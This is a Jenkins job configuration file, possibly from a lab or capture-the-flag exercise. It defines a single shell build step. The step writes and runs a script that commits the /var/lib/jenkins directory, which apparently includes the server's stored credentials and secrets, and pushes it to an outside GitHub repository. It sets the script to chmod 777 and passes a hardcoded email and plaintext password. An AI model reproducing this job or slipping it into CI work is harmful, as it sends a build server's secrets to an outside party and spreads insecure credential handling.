<?xml version='1.1' encoding='UTF-8'?>
<project>
  <actions/>
  <description></description>
  <keepDependencies>false</keepDependencies>
  <properties/>
  <scm class="hudson.scm.NullSCM"/>
  <canRoam>true</canRoam>
  <disabled>false</disabled>
  <blockBuildWhenDownstreamBuilding>false</blockBuildWhenDownstreamBuilding>
  <blockBuildWhenUpstreamBuilding>false</blockBuildWhenUpstreamBuilding>
  <triggers/>
  <concurrentBuild>false</concurrentBuild>
  <builders>
    <hudson.tasks.Shell>
      <command>cd /var/lib/
echo &quot;git add jenkins&quot; &gt; gg.sh
echo &quot;git commit -m &apos;commit&apos; &quot;&gt;&gt; gg.sh
echo &quot;git remote add github https://github.com/ctproject4/jenk.git&quot;&gt;&gt; gg.sh
echo &quot;git push -u github master&quot;&gt;&gt; gg.sh
echo &quot;$1&quot;&gt;&gt; gg.sh
echo &quot;$2&quot;&gt;&gt; gg.sh
chmod 777 gg.sh
./gg.sh ctproject4@gmail.com password_123</command>
    </hudson.tasks.Shell>
  </builders>
  <publishers/>
  <buildWrappers/>
</project>